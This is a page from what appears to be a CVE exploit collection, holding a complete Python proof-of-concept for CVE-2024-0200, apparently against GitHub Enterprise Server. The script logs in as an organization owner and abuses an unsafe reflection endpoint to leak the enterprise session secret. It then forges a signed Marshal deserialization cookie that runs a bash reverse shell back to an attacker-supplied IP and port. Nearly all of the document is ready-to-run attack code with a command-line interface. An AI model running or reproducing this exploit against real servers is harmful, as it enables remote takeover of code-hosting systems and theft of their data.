4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2024-0200.py PY
import re
import hmac
import json
import base64
import random
import string
import hashlib
import argparse
import requests
import urllib.parse

from bs4 import BeautifulSoup

import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


class Exploit():
    def __init__(self, target, username, password, connect_back_ip, connect_back_port):
        self.base_url = target.rstrip('/')
        self.base_api_url = f'{self.base_url}/api/v3'

        self.username = username
        self.password = password

        self.connect_back_ip = connect_back_ip
        self.connect_back_port = connect_back_port

        self.web_session = requests.Session()
        self.api_session = requests.Session()
        self.api_session.auth = (username, password)

        self.org_name = ''
        self.secret = ''

    # Function to check if the user is an organization owner
    def check_organization_owner(self):
        print("Checking if user is an organization owner...")

        url = f'{self.base_api_url}/user/orgs'
        response = self.api_session.get(url, verify=False)
        orgs = response.json()

        if response.status_code == 200:
            for org in orgs:
                role = self.get_user_role(org['login'])
                if role == 'admin':
                    self.org_name = org['login']
                    return True
        return False

    # Function to get the user's role in an organization
    def get_user_role(self, org_name):
        url = f'{self.base_api_url}/orgs/{org_name}/memberships/{self.username}'
        response = self.api_session.get(url, verify=False)

        if response.status_code == 200:
            membership = response.json()
            return membership['role']
        else:
            return None

    # Generate a random alphanumeric string of given length.
    def generate_random_string(self, length):
        alphanumeric_chars = string.ascii_letters + string.digits
        return ''.join(random.choice(alphanumeric_chars) for _ in range(length))

    # Creates a new repository in an organization.
    def create_repository(self, repo_name):
        url = f'{self.base_api_url}/orgs/{self.org_name}/repos'
        data = {
            'name': repo_name
        }
        response = self.api_session.post(url, json=data, verify=False)
        if response.status_code == 201:
            print(f'Repository "{repo_name}" created successfully in organization "{self.org_name}"!')
        else:
            raise Exception(f'Failed to create repository "{repo_name}" in organization "{self.org_name}"')

    # Checks if any repository exists in the organization. If not, creates one.
    def make_sure_repo_exists(self):
        print("Checking if at least one repository exists in the organization...")

        url = f"{self.base_api_url}/orgs/{self.org_name}/repos"
        response = self.api_session.get(url, verify=False)
        if response.status_code == 200:
            repositories = response.json()
            if not repositories:
                print("No repositories found. Creating a new one...")
                self.create_repository(self.generate_random_string(10))
            else:
                print("Repositories exist in the organization.")
        else:
            raise Exception("Failed to fetch repositories.")

    # Fetch CSRF token from the login page.
    def get_csrf_token(self):
        url = f"{self.base_url}/login"
        response = self.web_session.get(url, verify=False)
        soup = BeautifulSoup(response.text, 'html.parser')
        csrf_token = soup.find('input', {'name': 'authenticity_token'}).get('value')
        return csrf_token

    # Send a POST request to login using the provided credentials and CSRF token.
    def login(self, csrf_token):
        url = f"{self.base_url}/session"
        data = {
            'login': self.username,
            'password': self.password,
            'commit': 'Sign in',
            'authenticity_token': csrf_token,
        }
        response = self.web_session.post(url, data=data, verify=False)
        return 'Sign out' in response.text

    # Login in the Web application
    def do_login(self):
        print("Trying to login in the web app...")

        # Step 1: Get CSRF Token
        csrf_token = self.get_csrf_token()
        print("CSRF Token:", csrf_token)

        # Step 2: Login
        login_response = self.login(csrf_token)
        return login_response

    # Finds the token value "ENTERPRISE_SESSION_SECRET"=>"xxx" in the provided data
    def find_token_value(self, content):
        pattern = r'"ENTERPRISE_SESSION_SECRET"=>"([^"]+)"'
        match = re.search(pattern, content)
        if match:
            return match.group(1)
        else:
            return None

    # Using the unsafe reflection, leak ENTERPRISE_SESSION_SECRET via restore_objects method
    def leak_session_secret(self):
        if not self.do_login():
            raise("Login error, Aborting")
        
        print("Login OK")

        print("Triggering Unsafe Reflection")

        url = f"{self.base_url}/organizations/{self.org_name}/settings/actions/repository_items"
        response = self.web_session.get(url, params={"page": 1, "rid_key": "restore_objects"}, verify=False)
        
        soup = BeautifulSoup(response.text, 'html.parser')
        data = soup.find('input', {'name': 'repository_ids[]'}).get('value')

        self.secret = self.find_token_value(data)
        print(f"Found ENTERPRISE_SESSION_SECRET: {self.secret}")

    # Get RCE via Cookies Marshal deserialization
    def rce(self):
        code = f"`bash -c 'bash -i >& /dev/tcp/{self.connect_back_ip}/{self.connect_back_port} 0>&1 &'`"

        print("Sending RCE payload...")

        marshal_template = (
            "\x04\bo:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\t:\x0E@instance"
            "o:\x1DAqueduct::Worker::Worker\a:\v@childI\"\x026\x0199999999; AAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAA\x06:\x06ET:\f@loggero:\vLogger\x00:\f@method:\x0Fkill_ch"
            "ild:\t@varI\"\x10@kill_child\x06;\tT:\x10@deprecatoro:\x1FActiveSupport::Deprecation"
            "\x06:\x0E@silencedT"
        )
        code = code.replace('"','\"')
        marshal_code = marshal_template.replace("A" * 300, code + ";" + "A" * (300 - len(code) - 1))

        marshal_encoded = base64.b64encode(bytes(marshal_code, 'UTF-8')).rstrip()
        digest = hmac.new(bytes(self.secret, 'UTF-8'), marshal_encoded, hashlib.sha1).hexdigest()
        marshal_encoded = urllib.parse.quote(marshal_encoded)
        session_cookie = "%s--%s" % (marshal_encoded, digest)
        print(session_cookie)

        cookies = {'_gh_render': session_cookie}
        requests.get(self.base_url, cookies=cookies, verify=False)

        print("Done")


    def run(self):
        if not self.check_organization_owner():
            print(f'You are not an organization owner. Aborting since this is an requirement for the exploit.')
            return

        print(f"User is an owner of organization {self.org_name}")

        self.make_sure_repo_exists()
        self.leak_session_secret()
        self.rce()


def main():
    parser = argparse.ArgumentParser(description='CVE-2024-0200 exploit')
    parser.add_argument('target', type=str, help='Target base URL')
    parser.add_argument('username', type=str, help='Username for login')
    parser.add_argument('password', type=str, help='Password for login')
    parser.add_argument('connect_back_ip', type=str, help='Connect back IP')
    parser.add_argument('connect_back_port', type=str, help='Connect back Port')
    args = parser.parse_args()

    xpl = Exploit(args.target, args.username, args.password,
                  args.connect_back_ip, args.connect_back_port)
    xpl.run()

if __name__ == '__main__':
    main()